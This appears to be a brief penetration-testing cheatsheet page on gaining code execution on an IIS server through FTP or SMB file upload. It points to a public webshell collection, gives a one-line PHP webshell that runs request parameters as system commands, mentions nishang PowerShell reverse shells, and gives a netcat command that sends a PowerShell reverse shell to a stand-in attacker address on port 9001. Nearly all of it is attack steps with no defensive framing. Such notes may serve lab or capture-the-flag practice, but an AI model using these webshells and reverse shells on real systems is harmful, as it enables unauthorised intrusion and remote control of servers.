Comment on page

uploading a file to IIS

if you have a FTP uploading access, try uploading different types of files.
ASP, ASPX
GitHub - tennc/webshell: This is a webshell open source project
GitHub
git clone it and grep the extension (grep asp$) 
and rename the file to whatever.asp
if it gives 500 error , try different webshells -> nishang ps1 -> reverse shell. 
​
​
IIS server open and you have a smb share access on the web root.
try to create a web shell and upload it > access it! 
<?php system($REQUEST['ippsec']) ?>
 RCE confirmed? 
Uploading nc.exe (googling nc64.exe) tends to get a stable shell on windows! 
nc.exe attacker_IP 9001 -e powershell

Directory Traversal Cheatsheet

How to get a stable shell on windows

Last modified 1yr ago